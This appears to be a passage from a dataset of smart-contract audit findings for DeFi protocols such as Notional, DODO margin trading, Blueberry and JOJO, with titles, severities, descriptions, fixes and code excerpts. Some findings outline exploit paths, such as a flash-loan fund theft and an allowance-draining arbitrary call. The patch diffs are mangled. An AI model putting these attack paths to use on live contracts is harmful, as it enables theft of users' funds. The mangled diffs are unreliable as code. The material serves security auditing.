totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Secondary debt dust balances are not truncatedчmediumчDust balances in primary debt are truncated toward zero. However, this truncation was not performed against secondary debts.\\n```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n\\n`vaultState.totalDebtUnderlying` is primarily used to track the total debt of primary currency. Within the `updateAccountDebt` function, any dust balance in the `vaultState.totalDebtUnderlying` is truncated towards zero at the end of the function as shown above.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _updateTotalSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint16 currencyId,\\n uint256 maturity,\\n int256 netUnderlyingDebt,\\n PrimeRate memory pr\\n ) private {\\n VaultStateStorage storage balance = LibStorage.getVaultSecondaryBorrow()\\n [vaultConfig.vault][maturity][currencyId];\\n int256 totalDebtUnderlying = VaultStateLib.readDebtStorageToUnderlying(pr, maturity, balance.totalDebt);\\n \\n // Set the new debt underlying to storage\\n totalDebtUnderlying = totalDebtUnderlying.add(netUnderlyingDebt);\\n VaultStateLib.setTotalDebtStorage(\\n balance, pr, vaultConfig, currencyId, maturity, totalDebtUnderlying, false // not settled\\n );\\n```\\n\\nHowever, this approach was not consistently applied when handling dust balance in secondary debt within the `_updateTotalSecondaryDebt` function. Within the `_updateTotalSecondaryDebt` function, the dust balance in secondary debts is not truncated.чConsider truncating dust balance in secondary debt within the `_updateTotalSecondaryDebt` function similar to what has been done for primary debt.чThe inconsistency in handling dust balances in primary and secondary debt could potentially lead to discrepancies in debt accounting within the protocol, accumulation of dust, and result in unforeseen consequences.ч```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n -No minimum borrow size check against secondary debtsчmediumчSecondary debts were not checked against the minimum borrow size during exit, which could lead to accounts with insufficient debt becoming insolvent and the protocol incurring bad debts.\\n```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, \"Min Borrow\");\\n }\\n```\\n\\nA vault account has one primary debt (accountDebtUnderlying) and one or more secondary debts (accountDebtOne and accountDebtTwo).\\nWhen a vault account exits the vault, Notional will check that its primary debt (accountDebtUnderlying) meets the minimum borrow size requirement. If a vault account wants to exit under the minimum borrow size it must fully exit so that we do not have dust accounts that become insolvent. This check is being performed in Line 140 above.\\nHowever, this check is not performed against the secondary debts. As a result, it is possible that the secondary debts fall below the minimum borrow size after exiting.чConsider performing a similar check against the secondary debts (accountDebtOne and accountDebtTwo) within the `_setVaultAccount` function to ensure they do not fall below the minimum borrow size.чVault accounts with debt below the minimum borrow size are at risk of becoming insolvent, leaving the protocol with bad debts.ч```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, \"Min Borrow\");\\n }\\n```\\n -It may be possible to liquidate on behalf of another accountчmediumчIf the caller of any liquidation action is the vault itself, there is no validation of the `liquidator` parameter and therefore, any arbitrary account may act as the `liquidator` if they have approved any amount of funds for the `VaultLiquidationAction.sol` contract.\\nWhile the vault implementation itself should most likely handle proper validation of the parameters provided to actions enabled by the vault, the majority of important validation should be done within the Notional protocol. The base implementation for vaults does not seem to sanitise `liquidator` and hence users could deleverage accounts on behalf of a `liquidator` which has approved Notional's contracts.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\nчMake the necessary changes to `BaseStrategyVault.sol` or `_authenticateDeleverage()`, whichever is preferred.чA user may be forced to liquidate an account they do not wish to purchase vault shares for.ч```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n -MarginTrading.sol: Missing flash loan initiator check allows attacker to open trades, close trades and steal fundsчhighчThe `MarginTrading.executeOperation` function is called when a flash loan is made (and it can only be called by the lendingPool).\\nThe wrong assumption by the protocol is that the flash loan can only be initiated by the `MarginTrading` contract itself.\\nHowever this is not true. A flash loan can be initiated for any `receiverAddress`.\\n\\nSo an attacker can execute a flash loan with the `MarginTrading` contract as `receiverAddress`. Also the funds that are needed to pay back the flash loan are pulled from the `receiverAddress` and NOT from the initiator:\\nThis means the attacker can close a position or repay a position in the `MarginTrading` contract.\\nBy crafting a malicious swap, the attacker can even steal funds.\\nLet's assume there is an ongoing trade in a `MarginTrading` contract:\\n```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n\\nIn order to profit from this the attacker does the following (not considering fees for simplicity):\\nTake a flash loan of 30000 DAI with `MarginTrading` as `receiverAddress` with `mode=0` (flash loan is paid back in the same transaction)\\nPrice of WETH has dropped to 2000 DAI. The attacker uses a malicious swap contract that pockets 10000 DAI for the attacker and swaps the remaining 20000 DAI to 10 WETH (the attacker can freely choose the swap contract in the `_params` of the flash loan).\\nThe 10 WETH debt is repaid\\nWithdraw 30000 DAI from Aave to pay back the flash loanчThe fix is straightforward:\\n```\\ndiff --git a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..5b4b485 100644\\n--- a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n@@ -125,6 // Add the line below\\n125,7 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n address _initiator,\\n bytes calldata _params\\n ) external override onlyLendingPool returns (bool) {\\n// Add the line below\\n require(_initiator == address(this));\\n //decode params exe swap and deposit\\n {\\n```\\n\\nThis ensures that the flash loan has been initiated by the `MarginTrading.executeFlashLoans` function which is the intended initiator.чThe attacker can close trades, partially close trades and even steal funds.\\n(Note: It's not possible for the attacker to open trades because he cannot incur debt on behalf of the `MarginTrading` contract)ч```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n -MarginTrading.sol: The whole balance and not just the traded funds are deposited into Aave when a trade is openedчmediumчIt's expected by the protocol that funds can be in the `MarginTrading` contract without being deposited into Aave as margin.\\nWe can see this by looking at the `MarginTradingFactory.depositMarginTradingETH` and `MarginTradingFactory.depositMarginTradingERC20` functions.\\nIf the user sets `margin=false` as the parameter, the funds are only sent to the `MarginTrading` contract but NOT deposited into Aave.\\nSo clearly there is the expectation for funds to be in the `MarginTrading` contract that should not be deposited into Aave.\\nThis becomes an issue when a trade is opened.\\nLet's look at the `MarginTrading._openTrade` function that is called when a trade is opened:\\nThe whole balance of the token will be deposited into Aave:\\n```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n\\nNot just those funds that have been acquired by the swap. This means that funds that should stay in the `MarginTrading` contract might also be deposited as margin.чIt is necessary to differentiate the funds that are acquired by the swap and those funds that were there before and should stay in the contract:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..42f96cf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n@@ // Remove the line below\\n261,6 // Add the line below\\n261,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n bytes memory _swapParams,\\n address[] memory _tradeAssets\\n ) internal {\\n// Add the line below\\n int256[] memory _amountsBefore = new uint256[](_tradeAssets.length);\\n// Add the line below\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n _amountsBefore[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Add the line below\\n }\\n if (_swapParams.length > 0) {\\n // approve to swap route\\n for (uint256 i = 0; i < _swapApproveToken.length; i// Add the line below\\n// Add the line below\\n) {\\n@@ // Remove the line below\\n272,8 // Add the line below\\n276,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n }\\n uint256[] memory _tradeAmounts = new uint256[](_tradeAssets.length);\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Remove the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Remove the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n if (_amountsBefore[i] < IERC20(_tradeAssets[i]).balanceOf(address(this))) {\\n// Add the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)) // Remove the line below\\n _amountsBefore[i];\\n// Add the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n }\\n }\\n emit OpenPosition(_swapAddress, _swapApproveToken, _tradeAssets, _tradeAmounts);\\n }\\n```\\n\\nIf funds that were in the contract prior to the swap should be deposited there is the separate `MarginTrading.lendingPoolDeposit` function to achieve this.чWhen opening a trade funds can be deposited into Aave unintentionally. Thereby the funds act as margin and the trade can incur a larger loss than expected.ч```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n -AuraSpell#openPositionFarm fails to return all rewards to userчhighчWhen a user adds to an existing position on AuraSpell, the contract burns their current position and remints them a new one. The issues is that WAuraPool will send all reward tokens to the contract but it only sends Aura back to the user, causing all other rewards to be lost.\\n```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n\\nInside WAuraPools#burn reward tokens are sent to the user.\\n```\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n if (pos.collateralSize > 0) {\\n (uint256 pid, ) = wAuraPools.decodeId(pos.collId);\\n if (param.farmingPoolId != pid)\\n revert Errors.INCORRECT_PID(param.farmingPoolId);\\n if (pos.collToken != address(wAuraPools))\\n revert Errors.INCORRECT_COLTOKEN(pos.collToken);\\n bank.takeCollateral(pos.collateralSize);\\n wAuraPools.burn(pos.collId, pos.collateralSize);\\n _doRefundRewards(AURA);\\n }\\n```\\n\\nWe see above that the contract only refunds Aura to the user causing all other extra reward tokens received by the contract to be lost to the user.чWAuraPool returns the reward tokens it sends. Use this list to refund all tokens to the userчUser will lose all extra reward tokens from their original positionч```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n -ShortLongSpell#openPosition uses the wrong balanceOf when determining how much collateral to putчhighчThe _doPutCollateral subcall in ShortLongSpell#openPosition uses the balance of the uToken rather than the vault resulting in the vault tokens being left in the contract which will be stolen.\\n```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nWhen putting the collateral the contract is putting vault but it uses the balance of the uToken instead of the balance of the vault.чUse the balanceOf vault rather than vault.uTokenчVault tokens will be left in contract and stolenч```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n -BalancerPairOracle#getPrice will revert due to division by zero in some casesчmediumч`BalancerPairOracle#getPrice` internally calls `computeFairReserves`, which returns fair reserve amounts given spot reserves, weights, and fair prices. When the parameter `resA` passed to `computeFairReserves` is smaller than `resB`, division by 0 will occur.\\nIn `BalancerPairOracle#getPrice`, resA and resB passed to `computeFairReserves` are the balance of TokenA and TokenB of the pool respectively. It is common for the balance of TokenB to be greater than the balance of TokenA.\\n```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n\\nAnother case is when the decimals of tokenA is smaller than the decimals of tokenB, such as usdc(e6)-weth(e18).ч```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n@@ // Remove the line below\\n50,7 // Add the line below\\n50,7 @@ contract BalancerPairOracle is UsingBaseOracle, IBaseOracle {\\n // // Remove the line below\\n// Remove the line below\\n> fairResA / r1^wB = constant product\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA^wA * resB^wB * r1^wB\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA * (resB/resA)^wB * r1^wB = resA * (r1/r0)^wB\\n// Remove the line below\\n uint256 r0 = resA / resB;\\n// Add the line below\\n uint256 r0 = resA * 10**(decimalsB) / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n```\\nчAll functions that subcall `BalancerPairOracle#getPrice` will be affected.ч```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n -Updating the feeManger on config will cause desync between bank and vaultsчmediumчWhen the bank is initialized it caches the current config.feeManager. This is problematic since feeManger can be updated in config. Since it is precached the address in bank will not be updated leading to a desync between contracts the always pull the freshest value for feeManger and bank.\\n```\\n feeManager = config_.feeManager();\\n```\\n\\nAbove we see that feeManger is cached during initialization.\\n```\\n withdrawAmount = config.feeManager().doCutVaultWithdrawFee(\\n address(uToken),\\n shareAmount\\n );\\n```\\n\\nThis is in direct conflict with other contracts the always use the freshest value. This is problematic for a few reasons. The desync will lead to inconsistent fees across the ecosystem either charging users too many fees or not enough.чBlueBerryBank should always use config.feeManger instead of caching it.чAfter update users will experience inconsistent fees across the ecosystemч```\\n feeManager = config_.feeManager();\\n```\\n -ShortLongSpell#openPosition attempts to burn wrong tokenчmediumчShortLongSpell#openPosition attempts to burn vault.uToken when it should be using vault instead. The result is that ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position\\n```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n\\nWe see above that the contract attempts to withdraw vault.uToken from the wrapper.\\n```\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nThis is in direct conflict with the collateral that is actually deposited which is vault. This will cause the function to always revert when adding to an existing position.чBurn token should be vault rather than vault.uTokenчShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their positionч```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n -All allowances to DepositStableCoinToDealer and GeneralRepay can be stolen due to unsafe callчhighчDepositStableCoinToDealer.sol and GeneralRepay.sol are helper contracts that allow a user to swap and enter JOJODealer and JUSDBank respectively. The issue is that the call is unsafe allowing the contract to call the token contracts directly and transfer tokens from anyone who has approved the contract.\\n```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n\\nWe can see above that the call is totally unprotected allowing a user to make any call to any contract. This can be abused by calling the token contract and using the allowances of others. The attack would go as follows:\\nUser A approves the contract for 100 USDT\\nUser B sees this approval and calls depositStableCoin with the swap target as the USDT contract with themselves as the receiver\\nThis transfers all of user A USDT to themчOnly allow users to call certain whitelisted contracts.чAll allowances can be stolenч```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n -JUSD borrow fee rate is less than it should beчmediumчThe borrow fee rate calculation is wrong causing the protocol to take less fees than it should.\\nThe borrowFeeRate is calculated through getTRate():\\n```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n\\n`t0Rate` is initialized as `1e18` in the test contracts:\\n```\\n constructor(\\n uint256 _maxReservesNum,\\n address _insurance,\\n address _JUSD,\\n address _JOJODealer,\\n uint256 _maxPerAccountBorrowAmount,\\n uint256 _maxTotalBorrowAmount,\\n uint256 _borrowFeeRate,\\n address _primaryAsset\\n ) {\\n // // rest of code\\n t0Rate = JOJOConstant.ONE;\\n }\\n```\\n\\n`SECONDS_PER_YEAR` is equal to `365 days` which is 60 * 60 * 24 * 365 = 31536000:\\n```\\nlibrary JOJOConstant {\\n uint256 public constant SECONDS_PER_YEAR = 365 days;\\n}\\n```\\n\\nAs time passes, `getTRate()` value will increase. When a user borrows JUSD the contract doesn't save the actual amount of JUSD they borrow, `tAmount`. Instead, it saves the current \"value\" of it, t0Amount:\\n```\\n function _borrow(\\n DataTypes.UserInfo storage user,\\n bool isDepositToJOJO,\\n address to,\\n uint256 tAmount,\\n address from\\n ) internal {\\n uint256 tRate = getTRate();\\n // tAmount % tRate ? tAmount / tRate + 1 : tAmount % tRate\\n uint256 t0Amount = tAmount.decimalRemainder(tRate)\\n ? tAmount.decimalDiv(tRate)\\n : tAmount.decimalDiv(tRate) + 1;\\n user.t0BorrowBalance += t0Amount;\\n```\\n\\nWhen you repay the JUSD, the same calculation is done again to decrease the borrowed amount. Meaning, as time passes, you have to repay more JUSD.\\nLet's say that JUSDBank was live for a year with a borrowing fee rate of 10% (1e17). `getTRate()` would then return: $1e18 + 1e17 * 31536000 / 31536000 = 1.1e18$\\nIf the user now borrows 1 JUSD we get: $1e6 * 1e18 / 1.1e18 ~= 909091$ for `t0Amount`. That's not the expected 10% decrease. Instead, it's about 9.1%.чChange formula to: `t0Amount = tAmount - tAmount.decimalMul(tRate)` where `t0Rate` is initialized with `0` instead of `1e18`.чUsers are able to borrow JUSD for cheaper than expectedч```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n -Subaccount#execute lacks payableчmediumч`Subaccount#execute` lacks `payable`. If `value` in `Subaccount#execute` is not zero, it could always revert.\\n`Subaccount#execute` lacks `payable`. The caller cannot send the value.\\n```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n\\nThe `Subaccount` contract does not implement receive() `payable` or fallback() `payable`, so it is unable to receive value (eth) . Therefore, `Subaccount#execute` needs to add `payable`.чAdd a receive() external `payable` to the contract or `execute()` to add a `payable` modifier.ч`Subaccount#execute` cannot work if `value` != 0.ч```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n -It's possible to reset primaryCredit and secondaryCredit for insurance accountчmediumчWhen because of negative credit after liquidations of another accounts, insurance address doesn't pass `isSafe` check, then malicious user can call JOJOExternal.handleBadDebt and reset both primaryCredit and secondaryCredit for insurance account.\\n`insurance` account is handled by JOJO team. Team is responsible to top up this account in order to cover losses. When bad debt is handled, then its negative credit value is added to the `insurance` account. Because of that it's possible that primaryCredit of `insurance` account is negative and `Liquidation._isSafe(state, insurance) == false`.\\n```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n\\nSo it's possible for anyone to call `handleBadDebt` for `insurance` address, once its primaryCredit is negative and `Liquidation._isSafe(state, insurance) == false`. This will reset both primaryCredit and secondaryCredit variables to 0 and break `insurance` calculations.чDo not allow `handleBadDebt` call with insurance address.чInsurance primaryCredit and secondaryCredit variables are reset.ч```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n -When the `JUSDBank.withdraw()` is to another internal account the `ReserveInfo.isDepositAllowed` is not validatedчmediumчThe internal withdraw does not validate if the collateral reserve has activated/deactivated the isDepositAllowed variable\\nThe JUSDBank.withdraw() function has a param called isInternal that helps to indicate if the withdraw amount is internal between accounts or not. When the withdraw is internal the `ReserveInfo.isDepositAllowed` is not validated.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address 